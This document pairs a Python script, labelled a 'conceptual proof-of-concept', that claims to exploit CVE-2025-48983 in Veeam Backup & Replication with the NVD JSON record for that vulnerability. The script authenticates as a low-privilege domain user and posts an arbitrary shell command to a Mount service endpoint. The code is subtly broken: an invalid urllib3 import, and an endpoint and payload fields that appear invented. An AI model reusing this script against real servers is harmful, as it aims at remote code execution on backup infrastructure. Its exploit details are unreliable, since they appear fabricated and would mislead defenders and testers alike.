CVE-2025-48983

# CVE-2025-48983 PoC - Veeam Backup & Replication RCE # Note: This is a conceptual proof-of-concept for educational purposes only import requests import json from urllib3.disable_warnings import urllib3 urllib3.disable_warnings() class VeeamCVE202548983: def __init__(self, target_ip, username, password, domain): self.target_ip = target_ip self.username = username self.password = password self.domain = domain self.session = requests.Session() self.base_url = f"https://{target_ip}:9443" def authenticate(self): """Authenticate with valid domain credentials""" auth_url = f"{self.base_url}/api/oauth2/token" auth_data = { "grant_type": "password", "username": f"{self.domain}\\{self.username}", "password": self.password } response = self.session.post(auth_url, json=auth_data, verify=False) if response.status_code == 200: self.token = response.json().get('access_token') return True return False def exploit_mount_service(self, command): """Exploit Mount service to execute arbitrary command""" headers = { 'Authorization': f'Bearer {self.token}', 'Content-Type': 'application/json' } # Malicious request to Mount service exploit_payload = { 'action': 'mount', 'backup_id': 'malicious_backup_id', 'command': command, 'vm_id': 'vm_id_placeholder' } exploit_url = f"{self.base_url}/api/v1/mount/execute" response = self.session.post(exploit_url, json=exploit_payload, headers=headers, verify=False) return response.json() def execute_rce(self, target_command): """Main exploitation function""" if self.authenticate(): print(f"[+] Successfully authenticated as {self.domain}\\{self.username}") print(f"[*] Exploiting Mount service...") result = self.exploit_mount_service(target_command) return result else: print("[-] Authentication failed") return None if __name__ == "__main__": # Target configuration target = "192.168.1.100" user = "low_priv_user" pwd = "Password123!" domain = "CORP" # Command to execute on target cmd = "whoami > C:\\temp\\pwned.txt" exploit = VeeamCVE202548983(target, user, pwd, domain) result = exploit.execute_rce(cmd) print(f"[+] Exploitation result: {result}")

{"cve": {"id": "CVE-2025-48983", "sourceIdentifier": "[email protected]", "published": "2025-10-31T00:15:36.553", "lastModified": "2025-12-01T21:15:50.527", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the Mount service of Veeam Backup & Replication, which allows for remote code execution (RCE) on the Backup infrastructure hosts by an authenticated domain user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:veeam:veeam_backup_\\&_replication:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.0.0.1402", "versionEndExcluding": "12.3.2.4165", "matchCriteriaId": "ABA6D012-0B73-4D37-B42E-1BAE5E4A4221"}]}]}], "references": [{"url": "https://www.veeam.com/kb4771", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}